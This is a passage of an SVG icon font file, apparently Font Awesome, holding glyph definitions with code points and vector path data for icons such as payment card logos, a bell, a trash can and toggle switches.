-79 -17 -113h-46l1 22q-20 -26 -59 -26q-23 0 -37 16t-14 42q0 39 25.5 60.5t72.5 21.5q15 0 23 -1q2 7 2 13q0 20 -36 20q-29 0 -59 -10q0 4 8 48 q38 11 67 11q73 0 73 -62zM1809 722q-14 -24 -21 -62q-23 2 -31.5 -23t-25.5 -129h-56l3 14q19 104 29 199h52q0 -11 -4 -33q15 21 26.5 29.5t27.5 4.5zM1950 770h56l-43 -262h-53l3 19q-23 -23 -52 -23q-31 0 -49.5 24t-18.5 64q0 53 27.5 92t64.5 39q31 0 53 -29z M2061 640q0 148 -72.5 273t-198 198t-273.5 73q-181 0 -328 -110q127 -116 171 -284h-50q-44 150 -158 253q-114 -103 -158 -253h-50q44 168 171 284q-147 110 -328 110q-148 0 -273.5 -73t-198 -198t-72.5 -273t72.5 -273t198 -198t273.5 -73q181 0 328 110 q-120 111 -165 264h50q46 -138 152 -233q106 95 152 233h50q-45 -153 -165 -264q147 -110 328 -110q148 0 273.5 73t198 198t72.5 273zM2304 1280v-1280q0 -52 -38 -90t-90 -38h-2048q-52 0 -90 38t-38 90v1280q0 52 38 90t90 38h2048q52 0 90 -38t38 -90z" />
<glyph unicode="&#xf1f2;" horiz-adv-x="2304" d="M313 759q0 -51 -36 -84q-29 -26 -89 -26h-17v220h17q61 0 89 -27q36 -31 36 -83zM2089 824q0 -52 -64 -52h-19v101h20q63 0 63 -49zM380 759q0 74 -50 120.5t-129 46.5h-95v-333h95q74 0 119 38q60 51 60 128zM410 593h65v333h-65v-333zM730 694q0 40 -20.5 62t-75.5 42 q-29 10 -39.5 19t-10.5 23q0 16 13.5 26.5t34.5 10.5q29 0 53 -27l34 44q-41 37 -98 37q-44 0 -74 -27.5t-30 -67.5q0 -35 18 -55.5t64 -36.5q37 -13 45 -19q19 -12 19 -34q0 -20 -14 -33.5t-36 -13.5q-48 0 -71 44l-42 -40q44 -64 115 -64q51 0 83 30.5t32 79.5zM1008 604 v77q-37 -37 -78 -37q-49 0 -80.5 32.5t-31.5 82.5q0 48 31.5 81.5t77.5 33.5q43 0 81 -38v77q-40 20 -80 20q-74 0 -125.5 -50.5t-51.5 -123.5t51 -123.5t125 -50.5q42 0 81 19zM2240 0v527q-65 -40 -144.5 -84t-237.5 -117t-329.5 -137.5t-417.5 -134.5t-504 -118h1569 q26 0 45 19t19 45zM1389 757q0 75 -53 128t-128 53t-128 -53t-53 -128t53 -128t128 -53t128 53t53 128zM1541 584l144 342h-71l-90 -224l-89 224h-71l142 -342h35zM1714 593h184v56h-119v90h115v56h-115v74h119v57h-184v-333zM2105 593h80l-105 140q76 16 76 94q0 47 -31 73 t-87 26h-97v-333h65v133h9zM2304 1274v-1268q0 -56 -38.5 -95t-93.5 -39h-2040q-55 0 -93.5 39t-38.5 95v1268q0 56 38.5 95t93.5 39h2040q55 0 93.5 -39t38.5 -95z" />
<glyph unicode="&#xf1f3;" horiz-adv-x="2304" d="M119 854h89l-45 108zM740 328l74 79l-70 79h-163v-49h142v-55h-142v-54h159zM898 406l99 -110v217zM1186 453q0 33 -40 33h-84v-69h83q41 0 41 36zM1475 457q0 29 -42 29h-82v-61h81q43 0 43 32zM1197 923q0 29 -42 29h-82v-60h81q43 0 43 31zM1656 854h89l-44 108z M699 1009v-271h-66v212l-94 -212h-57l-94 212v-212h-132l-25 60h-135l-25 -60h-70l116 271h96l110 -257v257h106l85 -184l77 184h108zM1255 453q0 -20 -5.5 -35t-14 -25t-22.5 -16.5t-26 -10t-31.5 -4.5t-31.5 -1t-32.5 0.5t-29.5 0.5v-91h-126l-80 90l-83 -90h-256v271h260 l80 -89l82 89h207q109 0 109 -89zM964 794v-56h-217v271h217v-57h-152v-49h148v-55h-148v-54h152zM2304 235v-229q0 -55 -38.5 -94.5t-93.5 -39.5h-2040q-55 0 -93.5 39.5t-38.5 94.5v678h111l25 61h55l25 -61h218v46l19 -46h113l20 47v-47h541v99l10 1q10 0 10 -14v-86h279 v23q23 -12 55 -18t52.5 -6.5t63 0.5t51.5 1l25 61h56l25 -61h227v58l34 -58h182v378h-180v-44l-25 44h-185v-44l-23 44h-249q-69 0 -109 -22v22h-172v-22q-24 22 -73 22h-628l-43 -97l-43 97h-198v-44l-22 44h-169l-78 -179v391q0 55 38.5 94.5t93.5 39.5h2040 q55 0 93.5 -39.5t38.5 -94.5v-678h-120q-51 0 -81 -22v22h-177q-55 0 -78 -22v22h-316v-22q-31 22 -87 22h-209v-22q-23 22 -91 22h-234l-54 -58l-50 58h-349v-378h343l55 59l52 -59h211v89h21q59 0 90 13v-102h174v99h8q8 0 10 -2t2 -10v-87h529q57 0 88 24v-24h168 q60 0 95 17zM1546 469q0 -23 -12 -43t-34 -29q25 -9 34 -26t9 -46v-54h-65v45q0 33 -12 43.5t-46 10.5h-69v-99h-65v271h154q48 0 77 -15t29 -58zM1269 936q0 -24 -12.5 -44t-33.5 -29q26 -9 34.5 -25.5t8.5 -46.5v-53h-65q0 9 0.5 26.5t0 25t-3 18.5t-8.5 16t-17.5 8.5 t-29.5 3.5h-70v-98h-64v271l153 -1q49 0 78 -14.5t29 -57.5zM1798 327v-56h-216v271h216v-56h-151v-49h148v-55h-148v-54zM1372 1009v-271h-66v271h66zM2065 357q0 -86 -102 -86h-126v58h126q34 0 34 25q0 16 -17 21t-41.5 5t-49.5 3.5t-42 22.5t-17 55q0 39 26 60t66 21 h130v-57h-119q-36 0 -36 -25q0 -16 17.5 -20.5t42 -4t49 -2.5t42 -21.5t17.5 -54.5zM2304 407v-101q-24 -35 -88 -35h-125v58h125q33 0 33 25q0 13 -12.5 19t-31 5.5t-40 2t-40 8t-31 24t-12.5 48.5q0 39 26.5 60t66.5 21h129v-57h-118q-36 0 -36 -25q0 -20 29 -22t68.5 -5 t56.5 -26zM2139 1008v-270h-92l-122 203v-203h-132l-26 60h-134l-25 -60h-75q-129 0 -129 133q0 138 133 138h63v-59q-7 0 -28 1t-28.5 0.5t-23 -2t-21.5 -6.5t-14.5 -13.5t-11.5 -23t-3 -33.5q0 -38 13.5 -58t49.5 -20h29l92 213h97l109 -256v256h99l114 -188v188h66z" />
<glyph unicode="&#xf1f4;" horiz-adv-x="2304" d="M745 630q0 -37 -25.5 -61.5t-62.5 -24.5q-29 0 -46.5 16t-17.5 44q0 37 25 62.5t62 25.5q28 0 46.5 -16.5t18.5 -45.5zM1530 779q0 -42 -22 -57t-66 -15l-32 -1l17 107q2 11 13 11h18q22 0 35 -2t25 -12.5t12 -30.5zM1881 630q0 -36 -25.5 -61t-61.5 -25q-29 0 -47 16 t-18 44q0 37 25 62.5t62 25.5q28 0 46.5 -16.5t18.5 -45.5zM513 801q0 59 -38.5 85.5t-100.5 26.5h-160q-19 0 -21 -19l-65 -408q-1 -6 3 -11t10 -5h76q20 0 22 19l18 110q1 8 7 13t15 6.5t17 1.5t19 -1t14 -1q86 0 135 48.5t49 134.5zM822 489l41 261q1 6 -3 11t-10 5h-76 q-14 0 -17 -33q-27 40 -95 40q-72 0 -122.5 -54t-50.5 -127q0 -59 34.5 -94t92.5 -35q28 0 58 12t48 32q-4 -12 -4 -21q0 -16 13 -16h69q19 0 22 19zM1269 752q0 5 -4 9.5t-9 4.5h-77q-11 0 -18 -10l-106 -156l-44 150q-5 16 -22 16h-75q-5 0 -9 -4.5t-4 -9.5q0 -2 19.5 -59 t42 -123t23.5 -70q-82 -112 -82 -120q0 -13 13 -13h77q11 0 18 10l255 368q2 2 2 7zM1649 801q0 59 -38.5 85.5t-100.5 26.5h-159q-20 0 -22 -19l-65 -408q-1 -6 3 -11t10 -5h82q12 0 16 13l18 116q1 8 7 13t15 6.5t17 1.5t19 -1t14 -1q86 0 135 48.5t49 134.5zM1958 489 l41 261q1 6 -3 11t-10 5h-76q-14 0 -17 -33q-26 40 -95 40q-72 0 -122.5 -54t-50.5 -127q0 -59 34.5 -94t92.5 -35q29 0 59 12t47 32q0 -1 -2 -9t-2 -12q0 -16 13 -16h69q19 0 22 19zM2176 898v1q0 14 -13 14h-74q-11 0 -13 -11l-65 -416l-1 -2q0 -5 4 -9.5t10 -4.5h66 q19 0 21 19zM392 764q-5 -35 -26 -46t-60 -11l-33 -1l17 107q2 11 13 11h19q40 0 58 -11.5t12 -48.5zM2304 1280v-1280q0 -52 -38 -90t-90 -38h-2048q-52 0 -90 38t-38 90v1280q0 52 38 90t90 38h2048q52 0 90 -38t38 -90z" />
<glyph unicode="&#xf1f5;" horiz-adv-x="2304" d="M1597 633q0 -69 -21 -106q-19 -35 -52 -35q-23 0 -41 9v224q29 30 57 30q57 0 57 -122zM2035 669h-110q6 98 56 98q51 0 54 -98zM476 534q0 59 -33 91.5t-101 57.5q-36 13 -52 24t-16 25q0 26 38 26q58 0 124 -33l18 112q-67 32 -149 32q-77 0 -123 -38q-48 -39 -48 -109 q0 -58 32.5 -90.5t99.5 -56.5q39 -14 54.5 -25.5t15.5 -27.5q0 -31 -48 -31q-29 0 -70 12.5t-72 30.5l-18 -113q72 -41 168 -41q81 0 129 37q51 41 51 117zM771 749l19 111h-96v135l-129 -21l-18 -114l-46 -8l-17 -103h62v-219q0 -84 44 -120q38 -30 111 -30q32 0 79 11v118 q-32 -7 -44 -7q-42 0 -42 50v197h77zM1087 724v139q-15 3 -28 3q-32 0 -55.5 -16t-33.5 -46l-10 56h-131v-471h150v306q26 31 82 31q16 0 26 -2zM1124 389h150v471h-150v-471zM1746 638q0 122 -45 179q-40 52 -111 52q-64 0 -117 -56l-8 47h-132v-645l150 25v151 q36 -11 68 -11q83 0 134 56q61 65 61 202zM1278 986q0 33 -23 56t-56 23t-56 -23t-23 -56t23 -56.5t56 -23.5t56 23.5t23 56.5zM2176 629q0 113 -48 176q-50 64 -144 64q-96 0 -151.5 -66t-55.5 -180q0 -128 63 -188q55 -55 161 -55q101 0 160 40l-16 103q-57 -31 -128 -31 q-43 0 -63 19q-23 19 -28 66h248q2 14 2 52zM2304 1280v-1280q0 -52 -38 -90t-90 -38h-2048q-52 0 -90 38t-38 90v1280q0 52 38 90t90 38h2048q52 0 90 -38t38 -90z" />
<glyph unicode="&#xf1f6;" horiz-adv-x="2048" d="M1558 684q61 -356 298 -556q0 -52 -38 -90t-90 -38h-448q0 -106 -75 -181t-181 -75t-180.5 74.5t-75.5 180.5zM1024 -176q16 0 16 16t-16 16q-59 0 -101.5 42.5t-42.5 101.5q0 16 -16 16t-16 -16q0 -73 51.5 -124.5t124.5 -51.5zM2026 1424q8 -10 7.5 -23.5t-10.5 -22.5 l-1872 -1622q-10 -8 -23.5 -7t-21.5 11l-84 96q-8 10 -7.5 23.5t10.5 21.5l186 161q-19 32 -19 66q50 42 91 88t85 119.5t74.5 158.5t50 206t19.5 260q0 152 117 282.5t307 158.5q-8 19 -8 39q0 40 28 68t68 28t68 -28t28 -68q0 -20 -8 -39q124 -18 219 -82.5t148 -157.5 l418 363q10 8 23.5 7t21.5 -11z" />
<glyph unicode="&#xf1f7;" horiz-adv-x="2048" d="M1040 -160q0 16 -16 16q-59 0 -101.5 42.5t-42.5 101.5q0 16 -16 16t-16 -16q0 -73 51.5 -124.5t124.5 -51.5q16 0 16 16zM503 315l877 760q-42 88 -132.5 146.5t-223.5 58.5q-93 0 -169.5 -31.5t-121.5 -80.5t-69 -103t-24 -105q0 -384 -137 -645zM1856 128 q0 -52 -38 -90t-90 -38h-448q0 -106 -75 -181t-181 -75t-180.5 74.5t-75.5 180.5l149 129h757q-166 187 -227 459l111 97q61 -356 298 -556zM1942 1520l84 -96q8 -10 7.5 -23.5t-10.5 -22.5l-1872 -1622q-10 -8 -23.5 -7t-21.5 11l-84 96q-8 10 -7.5 23.5t10.5 21.5l186 161 q-19 32 -19 66q50 42 91 88t85 119.5t74.5 158.5t50 206t19.5 260q0 152 117 282.5t307 158.5q-8 19 -8 39q0 40 28 68t68 28t68 -28t28 -68q0 -20 -8 -39q124 -18 219 -82.5t148 -157.5l418 363q10 8 23.5 7t21.5 -11z" />
<glyph unicode="&#xf1f8;" horiz-adv-x="1408" d="M512 160v704q0 14 -9 23t-23 9h-64q-14 0 -23 -9t-9 -23v-704q0 -14 9 -23t23 -9h64q14 0 23 9t9 23zM768 160v704q0 14 -9 23t-23 9h-64q-14 0 -23 -9t-9 -23v-704q0 -14 9 -23t23 -9h64q14 0 23 9t9 23zM1024 160v704q0 14 -9 23t-23 9h-64q-14 0 -23 -9t-9 -23v-704 q0 -14 9 -23t23 -9h64q14 0 23 9t9 23zM480 1152h448l-48 117q-7 9 -17 11h-317q-10 -2 -17 -11zM1408 1120v-64q0 -14 -9 -23t-23 -9h-96v-948q0 -83 -47 -143.5t-113 -60.5h-832q-66 0 -113 58.5t-47 141.5v952h-96q-14 0 -23 9t-9 23v64q0 14 9 23t23 9h309l70 167 q15 37 54 63t79 26h320q40 0 79 -26t54 -63l70 -167h309q14 0 23 -9t9 -23z" />
<glyph unicode="&#xf1f9;" d="M1150 462v-109q0 -50 -36.5 -89t-94 -60.5t-118 -32.5t-117.5 -11q-205 0 -342.5 139t-137.5 346q0 203 136 339t339 136q34 0 75.5 -4.5t93 -18t92.5 -34t69 -56.5t28 -81v-109q0 -16 -16 -16h-118q-16 0 -16 16v70q0 43 -65.5 67.5t-137.5 24.5q-140 0 -228.5 -91.5 t-88.5 -237.5q0 -151 91.5 -249.5t233.5 -98.5q68 0 138 24t70 66v70q0 7 4.5 11.5t10.5 4.5h119q6 0 11 -4.5t5 -11.5zM768 1280q-130 0 -248.5 -51t-204 -136.5t-136.5 -204t-51 -248.5t51 -248.5t136.5 -204t204 -136.5t248.5 -51t248.5 51t204 136.5t136.5 204t51 248.5 t-51 248.5t-136.5 204t-204 136.5t-248.5 51zM1536 640q0 -209 -103 -385.5t-279.5 -279.5t-385.5 -103t-385.5 103t-279.5 279.5t-103 385.5t103 385.5t279.5 279.5t385.5 103t385.5 -103t279.5 -279.5t103 -385.5z" />
<glyph unicode="&#xf1fa;" d="M972 761q0 108 -53.5 169t-147.5 61q-63 0 -124 -30.5t-110 -84.5t-79.5 -137t-30.5 -180q0 -112 53.5 -173t150.5 -61q96 0 176 66.5t122.5 166t42.5 203.5zM1536 640q0 -111 -37 -197t-98.5 -135t-131.5 -74.5t-145 -27.5q-6 0 -15.5 -0.5t-16.5 -0.5q-95 0 -142 53 q-28 33 -33 83q-52 -66 -131.5 -110t-173.5 -44q-161 0 -249.5 95.5t-88.5 269.5q0 157 66 290t179 210.5t246 77.5q87 0 155 -35.5t106 -99.5l2 19l11 56q1 6 5.5 12t9.5 6h118q5 0 13 -11q5 -5 3 -16l-120 -614q-5 -24 -5 -48q0 -39 12.5 -52t44.5 -13q28 1 57 5.5t73 24 t77 50t57 89.5t24 137q0 292 -174 466t-466 174q-130 0 -248.5 -51t-204 -136.5t-136.5 -204t-51 -248.5t51 -248.5t136.5 -204t204 -136.5t248.5 -51q228 0 405 144q11 9 24 8t21 -12l41 -49q8 -12 7 -24q-2 -13 -12 -22q-102 -83 -227.5 -128t-258.5 -45q-156 0 -298 61 t-245 164t-164 245t-61 298t61 298t164 245t245 164t298 61q344 0 556 -212t212 -556z" />
<glyph unicode="&#xf1fb;" horiz-adv-x="1792" d="M1698 1442q94 -94 94 -226.5t-94 -225.5l-225 -223l104 -104q10 -10 10 -23t-10 -23l-210 -210q-10 -10 -23 -10t-23 10l-105 105l-603 -603q-37 -37 -90 -37h-203l-256 -128l-64 64l128 256v203q0 53 37 90l603 603l-105 105q-10 10 -10 23t10 23l210 210q10 10 23 10 t23 -10l104 -104l223 225q93 94 225.5 94t226.5 -94zM512 64l576 576l-192 192l-576 -576v-192h192z" />
<glyph unicode="&#xf1fc;" horiz-adv-x="1792" d="M1615 1536q70 0 122.5 -46.5t52.5 -116.5q0 -63 -45 -151q-332 -629 -465 -752q-97 -91 -218 -91q-126 0 -216.5 92.5t-90.5 219.5q0 128 92 212l638 579q59 54 130 54zM706 502q39 -76 106.5 -130t150.5 -76l1 -71q4 -213 -129.5 -347t-348.5 -134q-123 0 -218 46.5 t-152.5 127.5t-86.5 183t-29 220q7 -5 41 -30t62 -44.5t59 -36.5t46 -17q41 0 55 37q25 66 57.5 112.5t69.5 76t88 47.5t103 25.5t125 10.5z" />
<glyph unicode="&#xf1fd;" horiz-adv-x="1792" d="M1792 128v-384h-1792v384q45 0 85 14t59 27.5t47 37.5q30 27 51.5 38t56.5 11t55.5 -11t52.5 -38q29 -25 47 -38t58 -27t86 -14q45 0 85 14.5t58 27t48 37.5q21 19 32.5 27t31 15t43.5 7q35 0 56.5 -11t51.5 -38q28 -24 47 -37.5t59 -27.5t85 -14t85 14t59 27.5t47 37.5 q30 27 51.5 38t56.5 11q34 0 55.5 -11t51.5 -38q28 -24 47 -37.5t59 -27.5t85 -14zM1792 448v-192q-35 0 -55.5 11t-52.5 38q-29 25 -47 38t-58 27t-85 14q-46 0 -86 -14t-58 -27t-47 -38q-22 -19 -33 -27t-31 -15t-44 -7q-35 0 -56.5 11t-51.5 38q-29 25 -47 38t-58 27 t-86 14q-45 0 -85 -14.5t-58 -27t-48 -37.5q-21 -19 -32.5 -27t-31 -15t-43.5 -7q-35 0 -56.5 11t-51.5 38q-28 24 -47 37.5t-59 27.5t-85 14q-46 0 -86 -14t-58 -27t-47 -38q-30 -27 -51.5 -38t-56.5 -11v192q0 80 56 136t136 56h64v448h256v-448h256v448h256v-448h256v448 h256v-448h64q80 0 136 -56t56 -136zM512 1312q0 -77 -36 -118.5t-92 -41.5q-53 0 -90.5 37.5t-37.5 90.5q0 29 9.5 51t23.5 34t31 28t31 31.5t23.5 44.5t9.5 67q38 0 83 -74t45 -150zM1024 1312q0 -77 -36 -118.5t-92 -41.5q-53 0 -90.5 37.5t-37.5 90.5q0 29 9.5 51 t23.5 34t31 28t31 31.5t23.5 44.5t9.5 67q38 0 83 -74t45 -150zM1536 1312q0 -77 -36 -118.5t-92 -41.5q-53 0 -90.5 37.5t-37.5 90.5q0 29 9.5 51t23.5 34t31 28t31 31.5t23.5 44.5t9.5 67q38 0 83 -74t45 -150z" />
<glyph unicode="&#xf1fe;" horiz-adv-x="2048" d="M2048 0v-128h-2048v1536h128v-1408h1920zM1664 1024l256 -896h-1664v576l448 576l576 -576z" />
<glyph unicode="&#xf200;" horiz-adv-x="1792" d="M768 646l546 -546q-106 -108 -247.5 -168t-298.5 -60q-209 0 -385.5 103t-279.5 279.5t-103 385.5t103 385.5t279.5 279.5t385.5 103v-762zM955 640h773q0 -157 -60 -298.5t-168 -247.5zM1664 768h-768v768q209 0 385.5 -103t279.5 -279.5t103 -385.5z" />
<glyph unicode="&#xf201;" horiz-adv-x="2048" d="M2048 0v-128h-2048v1536h128v-1408h1920zM1920 1248v-435q0 -21 -19.5 -29.5t-35.5 7.5l-121 121l-633 -633q-10 -10 -23 -10t-23 10l-233 233l-416 -416l-192 192l585 585q10 10 23 10t23 -10l233 -233l464 464l-121 121q-16 16 -7.5 35.5t29.5 19.5h435q14 0 23 -9 t9 -23z" />
<glyph unicode="&#xf202;" horiz-adv-x="1792" d="M1292 832q0 -6 10 -41q10 -29 25 -49.5t41 -34t44 -20t55 -16.5q325 -91 325 -332q0 -146 -105.5 -242.5t-254.5 -96.5q-59 0 -111.5 18.5t-91.5 45.5t-77 74.5t-63 87.5t-53.5 103.5t-43.5 103t-39.5 106.5t-35.5 95q-32 81 -61.5 133.5t-73.5 96.5t-104 64t-142 20 q-96 0 -183 -55.5t-138 -144.5t-51 -185q0 -160 106.5 -279.5t263.5 -119.5q177 0 258 95q56 63 83 116l84 -152q-15 -34 -44 -70l1 -1q-131 -152 -388 -152q-147 0 -269.5 79t-190.5 207.5t-68 274.5q0 105 43.5 206t116 176.5t172 121.5t204.5 46q87 0 159 -19t123.5 -50 t95 -80t72.5 -99t58.5 -117t50.5 -124.5t50 -130.5t55 -127q96 -200 233 -200q81 0 138.5 48.5t57.5 128.5q0 42 -19 72t-50.5 46t-72.5 31.5t-84.5 27t-87.5 34t-81 52t-65 82t-39 122.5q-3 16 -3 33q0 110 87.5 192t198.5 78q78 -3 120.5 -14.5t90.5 -53.5h-1 q12 -11 23 -24.5t26 -36t19 -27.5l-129 -99q-26 49 -54 70v1q-23 21 -97 21q-49 0 -84 -33t-35 -83z" />
<glyph unicode="&#xf203;" d="M1432 484q0 173 -234 239q-35 10 -53 16.5t-38 25t-29 46.5q0 2 -2 8.5t-3 12t-1 7.5q0 36 24.5 59.5t60.5 23.5q54 0 71 -15h-1q20 -15 39 -51l93 71q-39 54 -49 64q-33 29 -67.5 39t-85.5 10q-80 0 -142 -57.5t-62 -137.5q0 -7 2 -23q16 -96 64.5 -140t148.5 -73 q29 -8 49 -15.5t45 -21.5t38.5 -34.5t13.5 -46.5v-5q1 -58 -40.5 -93t-100.5 -35q-97 0 -167 144q-23 47 -51.5 121.5t-48 125.5t-54 110.5t-74 95.5t-103.5 60.5t-147 24.5q-101 0 -192 -56t-144 -148t-50 -192v-1q4 -108 50.5 -199t133.5 -147.5t196 -56.5q186 0 279 110 q20 27 31 51l-60 109q-42 -80 -99 -116t-146 -36q-115 0 -191 87t-76 204q0 105 82 189t186 84q112 0 170 -53.5t104 -172.5q8 -21 25.5 -68.5t28.5 -76.5t31.5 -74.5t38.5 -74t45.5 -62.5t55.5 -53.5t66 -33t80 -13.5q107 0 183 69.5t76 174.5zM1536 1120v-960 q0 -119 -84.5 -203.5t-203.5 -84.5h-960q-119 0 -203.5 84.5t-84.5 203.5v960q0 119 84.5 203.5t203.5 84.5h960q119 0 203.5 -84.5t84.5 -203.5z" />
<glyph unicode="&#xf204;" horiz-adv-x="2048" d="M1152 640q0 104 -40.5 198.5t-109.5 163.5t-163.5 109.5t-198.5 40.5t-198.5 -40.5t-163.5 -109.5t-109.5 -163.5t-40.5 -198.5t40.5 -198.5t109.5 -163.5t163.5 -109.5t198.5 -40.5t198.5 40.5t163.5 109.5t109.5 163.5t40.5 198.5zM1920 640q0 104 -40.5 198.5 t-109.5 163.5t-163.5 109.5t-198.5 40.5h-386q119 -90 188.5 -224t69.5 -288t-69.5 -288t-188.5 -224h386q104 0 198.5 40.5t163.5 109.5t109.5 163.5t40.5 198.5zM2048 640q0 -130 -51 -248.5t-136.5 -204t-204 -136.5t-248.5 -51h-768q-130 0 -248.5 51t-204 136.5 t-136.5 204t-51 248.5t51 248.5t136.5 204t204 136.5t248.5 51h768q130 0 248.5 -51t204 -136.5t136.5 -204t51 -248.5z" />
<glyph unicode="&#xf205;" horiz-adv-x="2048" d="M0 640q0 130 51 248.5t136.5 204t204 136.5t248.5 51h768q130 0 248.5 -51t204 -136.5t136.5 -204t51 -248.5t-51 -248.5t-136.5 -204t-204 -136.5t-248.5 -51h-768q-130 0 -248.5 51t-204 136.5t-136.5 204t-51 248.5zM1408 128q104 0 198.5 40.5t163.5 109.5 t109.5 163.5t40.5 198.5t-40.5 198.5t-109.5 163.5t-163.5 109.5t-198.5 40.5t-198.5 -40.5t-163.5 -109.5t-109.5 -163.5t-40.5 -198.5t40.5 -198.5t109.5 -163.5t163.5 -109.5t198.5 -40.5z" />
<glyph unicode="&#xf206;" horiz-adv-x="2304" d="M762 384h-314q-40 0 -57.5 35t6.5 67l188 251q-65 31 -137 31q-132 0 -226 -94t-94 -226t94 -226t226 -94q115 0 203 72.5t111 183.5zM576 512h186q-18 85 -75 148zM1056 512l288 384h-480l-99 -132q105 -103 126 -252h165zM2176 448q0 132 -94 226t-226 94 q-60 0 -121 -24l174 -260q15 -23 10 -49t-27 -40q-15 -11 -36 -11q-35 0 -53 29l-174 260q-93 -95 -93 -225q0 -132 94 -226t226 -94t226 94t94 226zM2304 448q0 -185 -131.5 -316.5t-316.5 -131.5t-316.5 131.5t-131.5 316.5q0 97 39.5 183.5t109.5 149.5l-65 98l-353 -469 q-18 -26 -51 -26h-197q-23 -164 -149 -274t-294 -110q-185 0 -316.5 131.5t-131.5 316.5t131.5 316.5t316.5 131.5q114 0 215 -55l137 183h-224q-26 0 -45 19t-19 45t19 45t45 19h384v-128h435l-85 128h-222q-26 0 -45 19t-19 45t19 45t45 19h256q33 0 53 -28l267 -400 q91 44 192 44q185 0 316.5 -131.5t131.5 -316.5z" />
<glyph unicode="&#xf207;" d="M384 320q0 53 -37.5 90.5t-90.5 37.5t-90.5 -37.5t-37.5 -90.5t37.5 -90.5t90.5 -37.5t90.5 37.5t37.5 90.5zM1408 320q0 53 -37.5 90.5t-90.5 37.5t-90.5 -37.5t-37.5 -90.5t37.5 -90.5t90.5 -37.5t90.5 37.5t37.5 90.5zM1362 716l-72 384q-5 23 -22.5 37.5t-40.5 14.5 h-918q-23 0 -40.5 -14.5t-22.5 -37.5l-72 -384q-5 -30 14 -53t49 -23h1062q30 0 49 23t14 53zM1136 1328q0 20 -14 34t-34 14h-640q-20 0 -34 -14t-14 -34t14 -34t34 -14h640q20 0 34 14t14 34zM1536 603v-603h-128v-128q0 -53 -37.5 -90.5t-90.5 -37.5t-90.5 37.5 t-37.5 90.5v128h-768v-128q0 -53 -37.5 -90.5t-90.5 -37.5t-90.5 37.5t-37.5 90.5v128h-128v603q0 112 25 223l103 454q9 78 97.5 137t230 89t312.5 30t312.5 -30t230 -89t97.5 -137l105 -454q23 -102 23 -223z" />
<glyph unicode="&#xf208;" horiz-adv-x="2048" d="M1463 704q0 -35 -25 -60.5t-61 -25.5h-702q-36 0 -61 25.5t-25 60.5t25 60.5t61 25.5h702q36 0 61 -25.5t25 -60.5zM1677 704q0 86 -23 170h-982q-36 0 -61 25t-25 60q0 36 25 61t61 25h908q-88 143 -235 227t-320 84q-177 0 -327.5 -87.5t-238 -237.5t-87.5 -327 q0 -86 23 -170h982q36 0 61 -25t25 -60q0 -36 -25 -61t-61 -25h-908q88 -143 235.5 -227t320.5 -84q132 0 253 51.5t208 139t139 208t52 253.5zM2048 959q0 -35 -25 -60t-61 -25h-131q17 -85 17 -170q0 -167 -65.5 -319.5t-175.5 -263t-262.5 -176t-319.5 -65.5 q-246 0 -448.5 133t-301.5 350h-189q-36 0 -61 25t-25 61q0 35 25 60t61 25h132q-17 85 -17 170q0 167 65.5 319.5t175.5 263t262.5 176t320.5 65.5q245 0 447.5 -133t301.5 -350h188q36 0 61 -25t25 -61z" />
<glyph unicode="&#xf209;" horiz-adv-x="1280" d="M953 1158l-114 -328l117 -21q165 451 165 518q0 56 -38 56q-57 0 -130 -225zM654 471l33 -88q37 42 71 67l-33 5.5t-38.5 7t-32.5 8.5zM362 1367q0 -98 159 -521q18 10 49 10q15 0 75 -5l-121 351q-75 220 -123 220q-19 0 -29 -17.5t-10 -37.5zM283 608q0 -36 51.5 -119 t117.5 -153t100 -70q14 0 25.5 13t11.5 27q0 24 -32 102q-13 32 -32 72t-47.5 89t-61.5 81t-62 32q-20 0 -45.5 -27t-25.5 -47zM125 273q0 -41 25 -104q59 -145 183.5 -227t281.5 -82q227 0 382 170q152 169 152 427q0 43 -1 67t-11.5 62t-30.5 56q-56 49 -211.5 75.5 t-270.5 26.5q-37 0 -49 -11q-12 -5 -12 -35q0 -34 21.5 -60t55.5 -40t77.5 -23.5t87.5 -11.5t85 -4t70 0h23q24 0 40 -19q15 -19 19 -55q-28 -28 -96 -54q-61 -22 -93 -46q-64 -46 -108.5 -114t-44.5 -137q0 -31 18.5 -88.5t18.5 -87.5l-3 -12q-4 -12 -4 -14 q-137 10 -146 216q-8 -2 -41 -2q2 -7 2 -21q0 -53 -40.5 -89.5t-94.5 -36.5q-82 0 -166.5 78t-84.5 159q0 34 33 67q52 -64 60 -76q77 -104 133 -104q12 0 26.5 8.5t14.5 20.5q0 34 -87.5 145t-116.5 111q-43 0 -70 -44.5t-27 -90.5zM11 264q0 101 42.5 163t136.5 88 q-28 74 -28 104q0 62 61 123t122 61q29 0 70 -15q-163 462 -163 567q0 80 41 130.5t119 50.5q131 0 325 -581q6 -17 8 -23q6 16 29 79.5t43.5 118.5t54 127.5t64.5 123t70.5 86.5t76.5 36q71 0 112 -49t41 -122q0 -108 -159 -550q61 -15 100.5 -46t58.5 -78t26 -93.5 t7 -110.5q0 -150 -47 -280t-132 -225t-211 -150t-278 -55q-111 0 -223 42q-149 57 -258 191.5t-109 286.5z" />
<glyph unicode="&#xf20a;" horiz-adv-x="2048" d="M785 528h207q-14 -158 -98.5 -248.5t-214.5 -90.5q-162 0 -254.5 116t-92.5 316q0 194 93 311.5t233 117.5q148 0 232 -87t97 -247h-203q-5 64 -35.5 99t-81.5 35q-57 0 -88.5 -60.5t-31.5 -177.5q0 -48 5 -84t18 -69.5t40 -51.5t66 -18q95 0 109 139zM1497 528h206 q-14 -158 -98 -248.5t-214 -90.5q-162 0 -254.5 116t-92.5 316q0 194 93 311.5t233 117.5q148 0 232 -87t97 -247h-204q-4 64 -35 99t-81 35q-57 0 -88.5 -60.5t-31.5 -177.5q0 -48 5 -84t18 -69.5t39.5 -51.5t65.5 -18q49 0 76.5 38t33.5 101zM1856 647q0 207 -15.5 307 t-60.5 161q-6 8 -13.5 14t-21.5 15t-16 11q-86 63 -697 63q-625 0 -710 -63q-5 -4 -17.5 -11.5t-21 -14t-14.5 -14.5q-45 -60 -60 -159.5t-15 -308.5q0 -208 15 -307.5t60 -160.5q6 -8 15 -15t20.5 -14t17.5 -12q44 -33 239.5 -49t470.5 -16q610 0 697 65q5 4 17 11t20.5 14 t13.5 16q46 60 61 159t15 309zM2048 1408v-1536h-2048v1536h2048z" />
